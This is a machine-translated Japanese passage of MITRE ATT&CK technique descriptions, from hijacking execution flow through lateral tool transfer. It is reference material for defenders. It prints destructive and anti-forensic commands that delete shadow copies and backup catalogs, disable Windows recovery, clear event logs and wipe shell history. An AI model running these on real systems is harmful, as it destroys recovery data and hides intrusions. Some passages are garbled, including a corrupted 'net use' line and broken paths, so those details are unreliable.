検索順序の乗っ取りは、敵対者が、パスが与えられていないプログラムをWindowsが検索する順序を悪用した場合に発生します。DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001)とは異なり、プログラムを実行する際のメソッドによって検索順序が異なります。(引用:Microsoft CreateProcess) (引用:Windows NT Command Shell) (引用:Microsoft WinExec) しかし、Windowsは、Windowsシステムディレクトリを検索する前に、開始プログラムのディレクトリ内を検索するのが一般的である。検索順序のハイジャックに対して脆弱なプログラム(実行ファイルのパスを指定しないプログラム)を見つけた敵対者は、不適切に指定されたプログラムの名前を付けたプログラムを作成し、開始プログラムのディレクトリ内に配置することで、この脆弱性を利用することができます。

例えば、「example.exe」は、コマンドライン引数<code>net user</code>を指定して「cmd.exe」を実行します。敵対者がexample.exeと同じディレクトリ内に「net.exe」というプログラムを置くと、Windowsのシステムユーティリティであるnetの代わりに「net.exe」が実行されます。さらに、敵対者が「net.exe」と同じディレクトリ内に「net.com」というプログラムを置いた場合、PATHEXTで定義された実行可能な拡張子の順序により、<code>cmd.exe /C net user</code>は「net.exe」ではなく「net.com」を実行します。(引用:Microsoft Environment Property)

検索順序のハイジャックは、DLLのロードをハイジャックするための一般的な手法でもあり、[DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001)で取り上げています。
270
T1574.009 ハイジャック実行フロー:アンクオートパスによるパスインターセプト 敵対者は、脆弱なファイルパスの参照を乗っ取ることで、独自の悪意のあるペイロードを実行する可能性があります。

サービスパス(引用:Microsoft CurrentControlSet Services)やショートカットパスも、パスに1つ以上のスペースが含まれ、引用符で囲まれていない場合、パスの傍受に対して脆弱になる可能性があります(例,<code>C:unsafe path with space\program.exe</code> vs. <code>"C:safe path with space\program.exe"</code>)。)(引用:Help eliminate unquoted path)(Windowsレジストリキーに格納されています)敵対者がパスの上位ディレクトリに実行ファイルを配置すると、Windowsは意図した実行ファイルではなく、その実行ファイルを解決してしまいます。例えば、ショートカットのパスが<code>C:program files\myapp.exe</code>であった場合、敵対者は<code>C:program.exe</code>にプログラムを作成し、意図したプログラムの代わりに実行される可能性があります。(引用:Windows Unquoted Services) (引用:Windows Privilege Escalation Guide)

この手法は、実行ファイルが定期的に呼び出される場合の持続性や、傍受された実行ファイルがより高い権限を持つプロセスによって起動される場合の権限昇格に利用できます。
271
T1574.010 ハイジャック実行の流れ:サービスファイルのパーミッションの脆弱性 敵対者は、サービスが使用するバイナリを乗っ取ることで、独自の悪意のあるペイロードを実行する可能性があります。敵対者は、Windowsサービスの権限設定の欠陥を利用して、サービスの開始時に実行されるバイナリを置き換えることがあります。これらのサービスプロセスは、その機能の一部として、または他のアクションを実行するために、特定のバイナリを自動的に実行することがあります。対象となるバイナリを含むファイルシステムのディレクトリのパーミッションや、バイナリ自体のパーミッションが不適切に設定されている場合、対象となるバイナリは、ユーザーレベルのパーミッションを使用した別のバイナリで上書きされ、元のプロセスによって実行される可能性があります。元のプロセスやスレッドがより高い権限レベルで実行されている場合、置き換えられたバイナリもSYSTEMを含むより高い権限レベルで実行されます。

敵対者は、より高い権限レベルでコードを実行する手段として、この手法を使って正規のバイナリを悪意のあるバイナリに置き換える可能性があります。実行中のプロセスが、特定の時間や特定のイベント(システムの起動など)の間に実行されるように設定されている場合、この技術は永続性のためにも使用できます。
272
T1574.011 ハイジャック実行の流れ:サービスレジストリの権限の弱点 敵対者は、サービスが使用するレジストリエントリをハイジャックすることで、独自の悪意のあるペイロードを実行する可能性があります。レジストリの権限設定の不備を利用して、本来指定されている実行ファイルから自分がコントロールする実行ファイルにリダイレクトし、サービスの開始時に自分のコードを起動することがあります。 Windowsは、ローカルのサービス設定情報をレジストリの<code>HKLM\SYSTEM\CurrentControlSet\Services</code>に保存します。サービスのレジストリキーの下に保存された情報は、サービスコントローラ、sc.exe、[PowerShell](https://attack.mitre.org/techniques/T1059/001)、[Reg](https://attack.mitre.org/software/S0075)などのツールを使って、サービスの実行パラメータを変更するために操作することができます。レジストリキーへのアクセスは、アクセスコントロールリストとパーミッションによって制御されます。(引用:レジストリキーのセキュリティ)

ユーザーやグループの権限が適切に設定されておらず、サービスのレジストリキーへのアクセスが許可されている場合、敵対者はサービスのbinPath/ImagePathを変更して、自分のコントロール下にある別の実行ファイルを指すようにすることができます。サービスが開始または再起動されると、敵対者が制御するプログラムが実行され、サービスが実行されるように設定されているアカウントコンテキスト(ローカル/ドメインアカウント、SYSTEM、LocalService、NetworkService)への永続性の獲得や権限の昇格が可能になります。

また、敵対者は、サービスが失敗したときや意図的に破損したときに昇格コンテキストで実行される可能性のあるサービス障害パラメータ(<code>FailureCommand</code>など)に関連するレジストリキーを変更する可能性があります。(引用:Kansa Service related collectors)(引用:Tweet Registry Perms Weakness)
273
T1562 減損損失 敵対者は、被害者の環境のコンポーネントを悪意を持って改変し、防御機構を妨げたり無効にしたりすることがあります。これには、ファイアウォールやアンチウイルスなどの予防的な防御機能の障害だけでなく、防御者が活動を監査して悪意ある行動を特定するために使用する検知機能も含まれます。

敵対者は、イベントの集約や分析のメカニズムを標的にしたり、他のシステムコンポーネントを変更することでこれらの手順を妨害することもできます。
274
T1562.008 インペアード・ディフェンスクラウドログの無効化

クラウド環境では、ユーザーが環境内でどのような活動を行っているかを把握するために、監査ログやアプリケーションログを収集・分析することができます。攻撃者が十分な権限を持っていれば、ログを無効にして自分の活動の発見を避けることができます。例えば、AWSでは、攻撃者はさらなる悪意ある活動を行う前に、CloudWatch/CloudTrailの統合を無効にすることができます(Citation:Follow the CloudTrail:Generating strong AWS security signals with Sumo Logic)
275
T1562.002 防御力の低下Windowsイベントログの無効化 敵対者は、検知や監査に利用できるデータを制限するために、Windowsのイベントログを無効にすることがあります。Windowsのイベントログには、ログイン試行やプロセスの作成など、ユーザーやシステムの活動が記録されています。(引用:Windowsのログイベント) このデータは、セキュリティツールやアナリストが検出を行うために使用します。

敵対者は、システム全体のログを対象とする場合と、特定のアプリケーションのログだけを対象とする場合があります。Windowsのイベントログを無効にすることで、敵対者は侵害の証拠をあまり残さずに活動することができます。
276
T1562.007 防御力の低下クラウドファイアウォールの無効化と変更 敵対者は、クラウド環境内のファイアウォールを無効にしたり変更したりして、クラウドリソースへのアクセスを制限する制御を迂回することがあります。クラウドファイアウォールは、[システムファイアウォールの無効化または変更](https://attack.mitre.org/techniques/T1562/004)に記載されているシステムファイアウォールとは別のものです。

クラウド環境では、一般的に制限的なセキュリティグループとファイアウォールルールが利用されており、信頼されたIPアドレスから期待されたポートやプロトコルを介したネットワーク活動のみが許可されます。敵対者は、被害者のクラウド環境へのアクセスを許可するために、新しいファイアウォールのルールやポリシーを導入することがあります。たとえば、敵対者は、既存のセキュリティグループに新しい侵入ルールを作成して、あらゆるTCP/IP接続を許可するスクリプトまたはユーティリティを使用することができます。(引用:Expel IO Evil in AWS)

クラウドファイアウォールを変更または無効にすることで、通常は許可されない敵対者のC2通信、横移動、および/またはデータの流出が可能になる場合があります。
277
T1562.004 防御力の低下システムファイアウォールの無効化または変更 敵対者は、ネットワークの使用を制限する制御を回避するために、システムのファイアウォールを無効にしたり変更したりすることがあります。変更には、機構全体の無効化や、特定のルールの追加、削除、修正などがあります。これは、コマンドライン、Windows レジストリ キーの編集、Windows コントロール パネルなど、オペレーティング システムに応じてさまざまな方法で行うことができます。

システム ファイアウォールを変更または無効にすることで、敵対者は、通常では許可されない C2 通信、横移動、およびデータの流出を可能にすることがあります。
278
T1562.001 防御力の低下ツールの無効化と修正 敵対者は、自分たちのツールや活動が検出される可能性を避けるために、セキュリティツールを無効にすることがあります。これは、セキュリティソフトウェアやイベントログプロセスを停止したり、レジストリキーを削除してツールがランタイムで起動しないようにしたり、セキュリティツールのスキャンや情報の報告を妨害するその他の方法で行われます。 279
T1562.003 Impairの防御方法Impairコマンド履歴の記録 敵対者は、侵入したシステムで実行したコマンドを隠すために、コマンド履歴の記録を損なうことがあります。

LinuxやmacOSでは、コマンド履歴は環境変数<code>HISTFILE</code>で指定されたファイルに記録されます。ユーザがシステムからログオフすると、この情報はユーザのホームディレクトリにある<code>~/.bash_history</code>というファイルにフラッシュされます。<code>HISTCONTROL</code>環境変数は、<code>history</code>コマンドによって保存されるべきものを追跡し、ユーザーがログアウトしたときに最終的に<code>~/.bash_history</code>ファイルに保存されます。 <code>HISTCONTROL</code>は、macOSではデフォルトでは存在しませんが、ユーザーが設定することができ、尊重されます。

敵対者は、コマンドのロギングを防ぐために、環境変数historyをクリアしたり(<code>unset HISTFILE</code>)、コマンド履歴のサイズを0に設定したり(<code>export HISTFILESIZE=0</code>)することができます。さらに、<code>HISTCONTROL</code>は、"ignorespace "に設定するだけで、スペースで始まるコマンドを無視するように設定することができます。 <code>HISTCONTROL</code>は、"ignoredups "に設定することで、重複するコマンドを無視するように設定することもできます。一部のLinuxシステムでは、デフォルトで "ignoreboth "に設定されており、前述の例の両方をカバーしています。つまり、「ls」は保存されませんが、「ls」はヒストリに保存されることになります。

Windows システムでは、<code>PSReadLine</code> モジュールがすべての PowerShell セッションで使用されたコマンドを追跡し、ファイル(デフォルトでは <code>$env:APPDATA\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt</code>)に書き出します。敵対者は、<code>Set-PSReadLineOption -HistorySavePath {File Path}</code>を使用して、これらのログが保存される場所を変更することができます。これにより、<code>ConsoleHost_history.txt</code>がログを受信しなくなります。さらに、PowerShellコマンドの<code>Set-PSReadlineOption -HistorySaveStyle SaveNothing</code>を使用して、このファイルへのロギングをオフにすることも可能です。(引用元:Microsoft PowerShellコマンド履歴)(引用元:Sophos PowerShellコマンド監査)(引用元:Sophos PowerShellコマンド履歴フォレンジック)
280
T1562.006 インペア・ディフェンスインジケータ・ブロッキング 敵対者は、センサーによって典型的に捕捉される指標やイベントが収集・分析されるのを阻止しようとすることがあります。これには、イベント遠隔測定の収集とフローを制御する設定を改ざんすることで、悪意を持ってリダイレクトすること(引用:Microsoft Lamin Sept 2017)や、Event Tracing for Windows(ETW)などのホストベースのセンサーを無効にすること(引用:Microsoft About Event Tracing 2018)が含まれます。(引用:Medium Event Tracing Tampering 2018)これらの設定は、システム上の設定ファイルおよび/またはレジストリに保存されているだけでなく、[PowerShell](https://attack.mitre.org/techniques/T1059/001)や[Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)などの管理ユーティリティを介してアクセスできる場合があります。

ETWの妨害は複数の方法で実現できますが、最も直接的な方法は、[PowerShell](https://attack.mitre.org/techniques/T1059/001)の<code>Set-ETwTraceProvider</code>コマンドレットを使用して条件を定義すること、またはレジストリに直接アクセスして変更することです。

ネットワークベースの指標報告の場合、敵対者は中央分析を防ぐために報告に関連するトラフィックをブロックすることができます。これは、遠隔測定の転送を担当するローカルプロセスの停止や、セキュリティ情報およびイベント管理(SIEM)製品など、イベントの集約を担当する特定のホストへのトラフィックをブロックするホストベースのファイアウォールルールの作成など、多くの手段で実現できます。
281
T1525 インプラント内部画像 侵入者は、クラウドやコンテナのイメージに悪意のあるコードを埋め込んで、環境にアクセスした後に持続性を確立することがあります。Amazon Web Services (AWS)のAmazon Machine Image (AMI)、Google Cloud Platform (GCP)のイメージ、Azureのイメージ、そしてDockerなどの一般的なコンテナ・ランタイムを埋め込む、またはバックドアすることができます。Upload Malware](https://attack.mitre.org/techniques/T1608/001)とは異なり、この手法は、被害者の環境内のレジストリにイメージを埋め込むことに重点を置いています。インフラのプロビジョニング方法によっては、インフラのプロビジョニングツールが常に最新のイメージを使用するように指示されている場合、これにより永続的なアクセスが可能になります。(引用:Rhino Labs Cloud Image Backdoor Technique Sept 2019)

クラウドコンテナイメージにバックドアを仕込むことを容易にするツールが開発されました。(引用:Rhino Labs Cloud Backdoor September 2019) 攻撃者が侵害されたAWSインスタンスにアクセスし、利用可能なコンテナイメージをリストアップする権限を持っていれば、[Web Shell](https://attack.mitre.org/techniques/T1505/003)のようなバックドアを植え付けることができます。(引用:Rhino Labs Cloud Image Backdoor Technique Sept 2019)
282
T1070 ホストのインジケータ除去 敵対者は、ログや隔離されたマルウェアなどのキャプチャファイルなど、ホストシステム上で生成された成果物を削除または変更することがあります。ログの場所や形式はプラットフォームや製品によって異なりますが、標準的なオペレーティングシステムのログは、Windowsのイベントや、[Bash History](https://attack.mitre.org/techniques/T1552/003)や/var/log/*などのLinux/macOSのファイルとしてキャプチャされます。

これらの行為は、イベントの収集や報告、侵入行為の検知に使用されるその他の通知を妨害する可能性があります。これにより、注目すべきイベントが報告されなくなることで、セキュリティソリューションの完全性が損なわれる可能性があります。また、何が起こったかを判断するための十分なデータが得られないため、フォレンジック分析やインシデント対応が妨げられる可能性があります。
283
T1070.003 ホストのインジケータ除去コマンド履歴の消去 敵対者は、システムログを消去するだけでなく、侵入時の行動を隠すために、侵入したアカウントのコマンド履歴を消去することがあります。

Linux や macOS では、これらのコマンド履歴にいくつかの異なる方法でアクセスできます。ログイン中は、環境変数<code>HISTFILE</code>で指定されたファイルにコマンド履歴が記録されます。ユーザーがシステムからログオフすると、この情報はユーザーのホームディレクトリにある<code>~/.bash_history</code>というファイルにフラッシュされます。

敵対者は、手動で履歴をクリア (<code>history -c</code>) するか、bash の履歴ファイル <code>rm ~/.bash_history</code> を削除することで、これらのログからコマンドを削除することができます。bash_history</code>

Windows ホストでは、PowerShell には内蔵の履歴と <code>PSReadLine</code> モジュールによって管理されるコマンド履歴の 2 つの異なるコマンド履歴プロバイダがあります。内蔵履歴は、現在のセッションで使用されているコマンドのみを追跡します。

<code>PSReadLine</code>のコマンド履歴は、すべてのPowerShellセッションで使用されたコマンドを追跡し、ファイル(デフォルトでは<code>$env:APPDATA\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt</code>)に書き込まれます。この履歴ファイルは、セッションが終了しても削除されないため、すべてのセッションで利用でき、過去の履歴もすべて含まれています。(引用:Microsoft PowerShell Command History)

敵対者は、PowerShellコマンドの<code>Clear-History</code>を実行して、現在のPowerShellセッションのコマンド履歴をすべて消去することができます。しかし、このコマンドでは、<code>ConsoleHost_history.txt</code>ファイルは削除/消去されません。敵対者は、実行した PowerShell コマンドを隠すために、<code>ConsoleHost_history.txt</code>ファイルを削除したり、その内容を編集したりすることもあります。(引用: Sophos PowerShell command audit)(引用: Sophos PowerShell Command History Forensics)
284
T1070.002 ホスト上のインジケーター除去。LinuxやMacのシステムログの消去 敵対者は、侵入の証拠を隠すためにシステムログを消去することがあります。macOSとLinuxは、システムログを通じて、システムまたはユーザーが開始したアクションを記録します。ネイティブシステムのログの大部分は、<code>/var/log/</code>ディレクトリに保存されます。このディレクトリのサブフォルダは、以下のように、関連する機能によってログを分類しています。(引用:Linux Logs)

* <code>/var/log/messages:</code>:General and system-related messages
* <code>/var/log/secure</code> or <code>/var/log/auth.log</code>:認証ログ
* <code>/var/log/utmp</code> or <code>/var/log/wtmp</code>:ログイン記録
* <code>/var/log/kern.log</code>:Kernel logs
* <code>/var/log/cron.log</code>:Crond のログ
* <code>/var/log/maillog</code>:メールサーバのログ
* <code>/var/log/httpd/</code>:Webサーバのアクセスログ、エラーログ
285
T1070.001 ホスト上のインジケーターの除去Windowsイベントログの消去 敵対者は、侵入の活動を隠すために、Windowsイベントログを消去することがあります。Windowsイベントログは、コンピューターの警告や通知の記録です。イベントのソースには、システムで定義された3つのものがあります。システム、アプリケーション、セキュリティの3つのシステム定義のイベントソースがあり、5つのイベントタイプがあります。エラー」、「警告」、「情報」、「成功監査」、「失敗監査」の5つのイベントタイプがあります。

イベントログは以下のユーティリティーコマンドでクリアできます。

* <code>wevtutil cl system</code>
* <code>wevtutil cl application</code>
* <code>wevtutil cl security</code>

これらのログは、イベントビューアーのGUIや[PowerShell]( https://attack.mitre.org/techniques/T1059/001)など、他のメカニズムでもクリアできます。
286
T1070.004 ホスト上のインジケーター除去File Deletion 敵対者は、侵入行為によって残されたファイルを削除することがあります。敵対者がシステム上にドロップまたは作成したマルウェア、ツール、その他の非ネイティブなファイルは、ネットワーク内で何がどのように行われたかを示す痕跡を残すことがあります。これらのファイルの削除は、侵入中に行うことも、侵入後のプロセスの一部として行うこともでき、敵対者の足跡を最小限に抑えることができます。

クリーンアップを実行するために、ホスト・オペレーティング・システムから利用できるツールがありますが、敵対者は他のツールを使用する場合もあります。例えば、DELなどのネイティブな[cmd](https://attack.mitre.org/software/S0106)関数、Windows Sysinternals SDeleteなどの安全な削除ツール、またはその他のサードパーティ製のファイル削除ツールなどです。(引用:トレンドマイクロ APT攻撃ツール)
287
T1070.005 ホスト上のインジケーターの除去ネットワーク共有接続の解除 敵対者は、操作の痕跡を消去するために、不要になった共有接続を削除することがあります。Windows共有ドライブや[SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002)の接続は、不要になったら削除することができます。[Net](https://attack.mitre.org/software/S0039)は、<code>net use ˶‾᷄ -̫ ‾᷅˵</code>コマンドを使ってネットワーク共有接続を削除するユーティリティの例です。(引用:Technet Net Use) 288
T1070.006 ホストのインジケーター除去タイムストンプ 敵対者は、新規ファイルや既存ファイルの変更を隠すために、ファイルの時間属性を変更することがあります。タイムストンピングとは、ファイルのタイムスタンプ(修正時刻、アクセス時刻、作成時刻、変更時刻)を変更する技術で、多くの場合、同じフォルダ内にあるファイルを模倣します。これは、例えば、フォレンジック調査員やファイル分析ツールに目立たないように、敵対者によって変更または作成されたファイルに対して行われます。

タイムストンピングは、ファイル名の[マスカレード](https://attack.mitre.org/techniques/T1036)とともに、マルウェアやツールを隠すために使用されることがあります。(引用:WindowsIR Anti-Forensic Techniques)
289
T1202 間接的なコマンド実行 敵対者は、コマンドライン・インタープリタの使用を制限するセキュリティ制限を回避するために、コマンド実行を可能にするユーティリティを悪用する可能性があります。様々なWindowsユーティリティが、[cmd](https://attack.mitre.org/software/S0106)を起動せずにコマンドを実行するために使用されることがあります。例えば、[Forfiles](https://attack.mitre.org/software/S0193)、Program Compatibility Assistant (pcalua.exe)、Windows Subsystem for Linux (WSL)のコンポーネント、およびその他のユーティリティは、[Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)、[Run]ウィンドウ、またはスクリプトを介して、プログラムやコマンドの実行を呼び出すことができます。(Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)

敵対者は、[Defense Evasion](https://attack.mitre.org/tactics/TA0005)のためにこれらの機能を悪用する可能性があります。具体的には、[cmd](https://attack.mitre.org/software/S0106)や悪意のあるペイロードによく関連するファイル拡張子の使用を制限/防止する検出および/または緩和制御(グループポリシーなど)を潜り抜けながら、任意の実行を行うことができます。
290
T1105 イングレス・ツール・トランスファー 敵対者は、外部のシステムからツールやその他のファイルを侵害された環境に転送することがあります。ファイルは、外部の敵対者が制御するシステムから、被害者のネットワークにツールを持ち込むためのコマンド&コントロール・チャネルを介して、またはFTPなどの別のツールを使った代替プロトコルを介してコピーされることがあります。Mac や Linux では、scp、rsync、sftp などのネイティブツールを使用してファイルをコピーすることもできます。 291
T1490 システムの回復を阻害する 敵対者は、破損したシステムの回復を支援するために設計されたサービスをオフにして、回復を妨げるために、オペレーティングシステムの組み込みデータを削除または削除することがあります(引用:Talos Olympic Destroyer 2018)(引用:FireEye WannaCry 2017) オペレーティングシステムには、バックアップカタログ、ボリュームシャドウコピー、自動修復機能など、破損したシステムの修復を支援する機能が含まれている場合があります。敵対者は、[Data Destruction](https://attack.mitre.org/techniques/T1485)や[Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486)の効果を増強するために、システム回復機能を無効化または削除することがあります。(引用:Talos Olympic Destroyer 2018)(引用:FireEye WannaCry 2017)

敵対者がシステム回復機能を無効化または削除するために、多くのWindowsネイティブユーティリティが使用されています。

* <code>vssadmin.exe</code>は、システム上のすべてのボリュームシャドウコピーを削除するために使用できます - <code>vssadmin.exe delete shadows /all /quiet</code>
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) は、ボリュームシャドウコピーの削除に使用できます - <code>wmic shadowcopy delete</code>
* <code>wbadmin.exe</code> は、Windows バックアップカタログの削除に使用できます - <code>wbadmin.exe delete catalog -quiet</code>
* <code>bcdedit.exe</code> を使用して、ブート構成データを変更することにより、Windows の自動回復機能を無効にすることができます - <code>bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no</code
292
T1056 インプットキャプチャー 敵対者は、認証情報を取得したり、情報を収集したりするために、ユーザーの入力をキャプチャする方法を使用することがあります。通常のシステム利用では、ユーザはログインページ/ポータルやシステムのダイアログボックスなど、さまざまな異なる場所に認証情報を提供することがよくあります。入力キャプチャのメカニズムは、ユーザには透過的であったり (例: [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004))、ユーザを欺いて本物のサービスだと思われるものに入力をさせることに依存していたり (例: [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003))します。 293
T1056.004 インプット・キャプチャークレデンシャルAPIフッキング 敵対者は、ユーザー認証情報を収集するために、Windowsアプリケーションプログラミングインターフェイス(API)関数にフックする可能性があります。悪意のあるフッキングメカニズムは、ユーザー認証の認証情報を明らかにするパラメータを含むAPIコールを捕捉する可能性があります。(引用:Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) [キーロギング](https://attack.mitre.org/techniques/T1056/001)とは異なり、この技術はユーザー認証情報を明らかにするパラメータを含むAPI関数に特に焦点を当てています。フッキングには、これらの関数への呼び出しをリダイレクトすることが含まれ、以下の方法で実装することができます。

* **フックプロシージャ**、メッセージ、キーストローク、マウス入力などのイベントに応答して、指定されたコードをインターセプトして実行します。(引用:Microsoft Hook Overview)(引用:Elastic Process Injection July 2017)
* **インポートアドレステーブル(IAT)フッキング**、インポートされたAPI関数へのポインタが保存されているプロセスのIATへの変更を使用します。(引用:Elastic Process Injection 2017年7月)(引用:Adlice Software IAT Hooks 2014年10月)(引用:MWRInfoSecurity Dynamic Hooking 2015)
* **Inline hooking** これは、API関数の最初のバイトを上書きしてコードフローをリダイレクトするものです(引用:Elastic Process Injection 2017年7月)(引用:HighTech Bridge Inline Hooking 2011年9月)(引用:MWRInfoSecurity Dynamic Hooking 2015)
294
T1056.002 インプットキャプチャー。GUI入力のキャプチャ Adversaryは、一般的なオペレーティングシステムのGUIコンポーネントを模倣して、一見すると正当なプロンプトでユーザーに認証情報を求めることがあります。

敵対者は、この機能を模倣して、追加のアクセスを必要とする偽のインストーラや偽のマルウェア除去スイートなど、通常の使用方法を模した様々な理由で、一見すると正当なプロンプトでユーザーに認証情報を求めることがあります。(引用:OSX Malware Exploits MacKeeper)この種のプロンプトは、AppleScript(引用:LogRhythm Do You Trust Oct 2014)(引用:OSX Keydnap malware)やPowerShell(引用:LogRhythm Do You Trust Oct 2014)(引用:Enigma Phishing for Credentials Jan 2015)など、さまざまな言語を介して認証情報を収集するために使用することができます。
295
T1056.001 インプット・キャプチャーキーロギング 敵対者は、ユーザのキーストロークを記録して、ユーザが入力する際に認証情報を傍受することがあります。キーロギングは、[OSのクレデンシャル・ダンピング](https://attack.mitre.org/techniques/T1003)が効果的でない場合に、新たなアクセス機会のためのクレデンシャルを取得するために使用される可能性が高く、クレデンシャルの取得に成功するまでには、敵対者がかなりの期間システムのキーストロークを傍受する必要がある場合があります。

キーロギングは、入力キャプチャの最も一般的なタイプで、キーストロークを傍受する方法は数多くあります。(引用:Adventures of a Keystroke) いくつかの方法を以下に示します。

* キーストロークの処理に使用されるAPIコールバックのフッキング。
* ハードウェアバッファからキーストロークの生データを読み取る
* Windowsレジストリの変更
* カスタムドライバ
* [Modify System Image](https://attack.mitre.org/techniques/T1601)は、ネットワークデバイスのOSにフックをかけてログインセッションの生のキーストロークを読み取る方法を敵対者に提供する可能性があります。(引用:Cisco Blog Legacy Device Attacks)
296
T1056.003 インプット・キャプチャーWebポータルキャプチャ 侵入者は、VPNのログインページなど、外部に面したポータルにコードをインストールして、サービスにログインしようとするユーザの認証情報をキャプチャして送信することがあります。例えば、侵害されたログインページでは、ユーザーがサービスにログインする前に、提供されたユーザーの認証情報をログに記録することができます。

入力情報の取得に関するこのバリエーションは、[External Remote Services](https://attack.mitre.org/techniques/T1133)や[Valid Accounts](https://attack.mitre.org/techniques/T1078)によるネットワークアクセスを維持するためのバックアップ手段として、正当な管理者アクセスを使用して侵害後に実施される場合もあれば、外部に面したWebサービスを悪用して最初の侵害の一部として実施される場合もあります。(引用:Volexity Virtual Private Keylogging)
297
T1559 プロセス間通信 敵対者は、プロセス間通信(IPC)メカニズムを悪用して、ローカルコードやコマンドを実行することがあります。IPCは通常、プロセスがデータを共有したり、相互に通信したり、実行を同期させたりするために使用されます。また、IPCは、プロセスが周期的な待機パターンに陥ったときに発生するデッドロックなどの状況を回避するためにもよく使われます。

敵対者は、IPCを悪用して任意のコードやコマンドを実行する可能性があります。IPCの仕組みはOSによって異なりますが、一般的にはプログラミング言語/ライブラリや、Windowsの[Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002)や[Component Object Model](https://attack.mitre.org/techniques/T1559/001)のようなネイティブインターフェースからアクセスできる形で存在しています。また、[Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)のような高レベルの実行媒体も、基礎となるIPCメカニズムを活用することができます。
298
T1559.001 プロセス間通信。コンポーネントオブジェクトモデル 敵対者は、ローカルコードの実行にWindowsコンポーネントオブジェクトモデル(COM)を使用することがあります。COMは、ネイティブなWindowsアプリケーション・プログラミング・インターフェース(API)のプロセス間通信(IPC)コンポーネントであり、ソフトウェア・オブジェクト、または1つ以上のインターフェースを実装した実行可能コード間の相互作用を可能にします(引用:Fireeye Hunting COM June 2019)COMを介して、クライアント・オブジェクトは、通常はバイナリのダイナミック・リンク・ライブラリ(DLL)または実行ファイル(EXE)であるサーバー・オブジェクトのメソッドを呼び出すことができます。(引用:Microsoft COM)

C、C++、Java、[Visual Basic]などの様々なプログラミング言語を介して任意の実行を呼び出すために悪用できる様々なCOMインターフェースが公開されています(https://attack.mitre.org/techniques/T1059/005)。(引用:Microsoft COM) 特定のCOMオブジェクトも存在し、[Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)の作成、ファイルレスのダウンロード/実行など、コードの実行を超えた機能を直接実行し、権限の昇格や持続に関連した敵対行為を行います。(引用:Fireeye Hunting COM 2019年6月号)(引用:ProjectZero File Write EoP 2018年4月号)
299
T1559.002 プロセス間通信。ダイナミックなデータ交換 敵対者は、Windows Dynamic Data Exchange (DDE) を使用して任意のコマンドを実行する可能性があります。DDEは、アプリケーション間で1回限りまたは継続的にプロセス間通信(IPC)を行うためのクライアント・サーバープロトコルです。リンクが確立されると、アプリケーションは、文字列、ウォームデータリンク(データアイテムが変更されたときの通知)、ホットデータリンク(データアイテムに対する変更の複製)、およびコマンド実行要求からなるトランザクションを自律的に交換することができます。

OLE(Object Linking and Embedding)、つまりドキュメント間でデータをリンクする機能は、もともとDDEによって実装されていました。Component Object Model](https://attack.mitre.org/techniques/T1559/001)に取って代わられたにもかかわらず、Windows 10とMicrosoft Office 2016のほとんどで、レジストリキーによってDDEが有効になっている場合があります。(引用:BleepingComputer DDE Disabled in Word Dec 2017) (引用:Microsoft ADV170021 Dec 2017) (引用:Microsoft DDE Advisory Nov 2017)

Microsoft Office文書は、DDEコマンドでポイズニングされたり(引用:SensePost PS DDE May 2016) (引用:Kettle CSV DDE Aug 2014)、直接または埋め込みファイルを介して(引用:Enigma Reviving DDE Jan 2018)、[Phishing](https://attack.)を介した実行配信に利用されたりします。mitre.org/techniques/T1566)キャンペーンやホストされたWebコンテンツで、VBA(Visual Basic for Applications)マクロの使用を回避しています。(引用:SensePost MacroLess DDE 2017年10月) DDEは、[Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)に直接アクセスできない、侵害されたマシン上で動作する敵対者によっても活用される可能性がある。
300
T1534 内部のスピアフィッシング 敵対者は、同一組織内のアカウントやシステムにすでにアクセスした後で、追加の情報にアクセスしたり、他のユーザを悪用したりするために、内部スピアフィッシングを使用することがあります。内部スピアフィッシングとは、あらかじめインストールされたマルウェアを使ってユーザの端末を操作するか、ユーザのアカウント認証情報を漏洩させることで、メールアカウントを所有するという複数の段階からなる攻撃です。敵対者は、信頼されている内部アカウントを利用して、ターゲットを騙してフィッシングを試みる可能性を高めようとします。(引用:Trend Micro When Phishing Starts from the Inside 2017)

敵対者は、[Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)や[Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)を利用してペイロードを配信したり、外部サイトにリダイレクトしたりして、電子メールのログインインターフェースを模倣したサイトで[Input Capture](https://attack.mitre.org/techniques/T1056)を通じて認証情報を取得することがあります。

内部のスピアフィッシングが利用された注目すべき事件がありました。Eye Pyramidキャンペーンでは、被害者間の横移動に悪意のある添付ファイル付きのフィッシングメールを使用し、その過程で約18,000のメールアカウントを侵害しました(引用:Trend Micro When Phishing Starts from the Inside 2017)Syrian Electronic Army(SEA)は、Financial Times(FT)のメールアカウントを侵害し、追加のアカウント認証情報を盗み出しました。FTが攻撃を知り、従業員に脅威を警告し始めると、SEAはフィナンシャル・タイムズのIT部門を模倣したフィッシングメールを送信し、さらに多くのユーザーを侵害することができました(引用:THE FINANCIAL TIMES LTD 2019.)
301
T1570 ラテラルツールトランスファー 敵対者は、侵害された環境において、システム間でツールやその他のファイルを転送することがあります。ファイルをあるシステムから別のシステムにコピーして、敵対者のツールやその他のファイルを操作の過程でステージングすることがあります。敵対者は、内部の被害者システム間でファイルを横方向にコピーし、横方向の移動をサポートするために、SMBを介して接続されたネットワーク共有へのファイル共有や、[SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002)や[Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)による認証された接続など、固有のファイル共有プロトコルを使用することがあります。また、MacやLinuxでは、scp、rsync、sftpなどのネイティブツールを使ってファイルをコピーすることができます。 302
